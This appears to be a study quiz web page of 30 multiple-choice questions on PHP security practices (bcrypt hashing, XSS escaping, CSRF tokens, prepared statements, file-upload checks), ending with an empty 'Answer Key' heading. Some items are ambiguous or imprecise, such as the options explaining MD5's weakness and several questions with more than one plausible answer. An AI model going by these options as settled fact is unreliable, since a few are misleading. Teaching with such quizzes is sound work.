MCQs on Security Practices | PHP Intermediate

Ensuring your PHP applications are secure is crucial to protect user data and maintain trust. Learn essential security practices, including password hashing, XSS and CSRF prevention, and SQL injection protection.

PHP Security Practices – 30 Multiple Choice Questions

1. Hashing Passwords (bcrypt, SHA256)

1. Which of the following is the most secure method for hashing passwords in PHP?
   • A) MD5
   • B) SHA1
   • C) bcrypt
   • D) Base64 encoding
2. What is the primary purpose of hashing passwords?
   • A) To encrypt passwords
   • B) To store passwords in a reversible format
   • C) To securely store passwords without reversing
   • D) To compress passwords
3. Which PHP function is used to hash passwords using bcrypt?
   • A) password_hash()
   • B) hash_password()
   • C) bcrypt_hash()
   • D) secure_password()
4. What is the benefit of using bcrypt for hashing passwords?
   • A) It is very fast to compute
   • B) It supports dynamic hashing and salting
   • C) It uses one-way encryption
   • D) It allows reversible encryption
5. Which hashing algorithm is recommended for password storage in modern web applications?
   • A) SHA256
   • B) SHA512
   • C) bcrypt
   • D) MD5
6. How do you verify if a password matches a hash in PHP?
   • A) password_verify()
   • B) verify_password()
   • C) hash_verify()
   • D) password_check()
7. What is the purpose of a salt in password hashing?
   • A) To reduce the size of the password
   • B) To make the hash unique even for identical passwords
   • C) To reverse the hash
   • D) To encrypt the password
8. Why is MD5 considered insecure for hashing passwords?
   • A) It is very slow
   • B) It uses an easy-to-reverse algorithm
   • C) It does not support salting
   • D) It is computationally expensive

2. Cross-Site Scripting (XSS) Prevention

9. What is Cross-Site Scripting (XSS)?
   • A) A vulnerability that allows attackers to execute scripts in the user’s browser
   • B) A method to prevent SQL injection
   • C) A vulnerability for session hijacking
   • D) A type of file upload vulnerability
10. Which of the following is the most effective way to prevent XSS attacks?
    • A) Using htmlspecialchars() to escape user input
    • B) Storing input data in cookies
    • C) Encrypting user input
    • D) Using a Content Security Policy (CSP)
11. What PHP function should be used to sanitize user input to prevent XSS attacks?
    • A) htmlentities()
    • B) htmlspecialchars()
    • C) strip_tags()
    • D) all of the above
12. Which of the following is the most secure way to include user input in HTML output?
    • A) Directly insert the input without any sanitization
    • B) Use htmlspecialchars() to escape special characters
    • C) Use regular expressions to filter input
    • D) Convert user input to JSON format
13. What is the purpose of using a Content Security Policy (CSP)?
    • A) To prevent Cross-Site Request Forgery (CSRF) attacks
    • B) To define which sources can execute scripts on the page
    • C) To prevent SQL injection attacks
    • D) To authenticate users
14. What type of XSS attack allows the attacker to inject a malicious script that is stored on the server?
    • A) Reflected XSS
    • B) Stored XSS
    • C) DOM-based XSS
    • D) Cross-Site Scripting Injection
15. Which of the following is an example of a stored XSS attack?
    • A) A user submitting a comment that contains a script
    • B) A user clicking a link containing a malicious payload
    • C) An attacker intercepting the user’s session
    • D) A user sending a request with altered HTTP headers

3. Cross-Site Request Forgery (CSRF) Protection

16. What is Cross-Site Request Forgery (CSRF)?
    • A) A vulnerability that allows attackers to execute unwanted actions on behalf of authenticated users
    • B) A method to bypass user authentication
    • C) A vulnerability in SQL queries
    • D) A security measure against XSS
17. Which of the following is a common way to prevent CSRF attacks?
    • A) Validating input data with htmlspecialchars()
    • B) Using HTTP-only cookies
    • C) Implementing anti-CSRF tokens in forms
    • D) Using secure password hashing
18. How does an anti-CSRF token work?
    • A) It prevents SQL injection
    • B) It uniquely identifies legitimate requests to the server
    • C) It encrypts user data
    • D) It hashes the user’s session ID
19. Which PHP function is used to generate a random anti-CSRF token?
    • A) rand()
    • B) bin2hex()
    • C) random_bytes()
    • D) csrf_token()
20. Where should the anti-CSRF token be placed in a form to protect against CSRF attacks?
    • A) As a hidden field in the form
    • B) In the URL parameters
    • C) In the cookies
    • D) As a query parameter
21. What should the server do when it receives a request with an invalid or missing CSRF token?
    • A) Process the request normally
    • B) Redirect the user to the login page
    • C) Reject the request and show an error
    • D) Encrypt the request data

4. SQL Injection Prevention

22. What is SQL injection?
    • A) A type of file upload vulnerability
    • B) A technique to execute malicious SQL queries through user input
    • C) A type of authentication bypass attack
    • D) A vulnerability related to password hashing
23. Which of the following is the most effective way to prevent SQL injection in PHP?
    • A) Using prepared statements with bound parameters
    • B) Using mysql_real_escape_string() for sanitizing input
    • C) Using htmlspecialchars() for sanitizing user input
    • D) Disabling all SQL commands
24. What is the purpose of using prepared statements in MySQL?
    • A) To escape SQL keywords
    • B) To prevent SQL injection by separating queries from user data
    • C) To improve database performance
    • D) To ensure data is encrypted
25. What is the risk of using mysql_real_escape_string() for preventing SQL injection?
    • A) It is slow
    • B) It may still allow some types of SQL injection attacks
    • C) It makes queries more difficult to read
    • D) It is not compatible with prepared statements
26. Which of the following is a recommended practice for using SQL queries safely?
    • A) Always use prepared statements and bound parameters
    • B) Use mysql_query() directly with user input
    • C) Escape user data manually with addslashes()
    • D) Accept unescaped input from users
27. What should you do if you detect an SQL injection vulnerability in your application?
    • A) Ignore it, as it is not a big threat
    • B) Fix the input validation and use prepared statements
    • C) Disable the database access temporarily
    • D) Encrypt all queries

5. Secure File Uploading

28. Which of the following is a recommended security practice for file uploads in PHP?
    • A) Accept all file types without restriction
    • B) Rename uploaded files and store them in non-public directories
    • C) Only accept images and allow any file type
    • D) Save files with user-supplied names
29. What function is used to check the MIME type of a file in PHP?
    • A) mime_type()
    • B) get_mime_type()
    • C) finfo_file()
    • D) file_mime_type()
30. How can you protect against malicious file uploads that could harm the server?
    • A) Use file_get_contents() to inspect file content
    • B) Validate the file extension and MIME type
    • C) Save all uploaded files in the public directory
    • D) Rename all files to random strings

Answer Key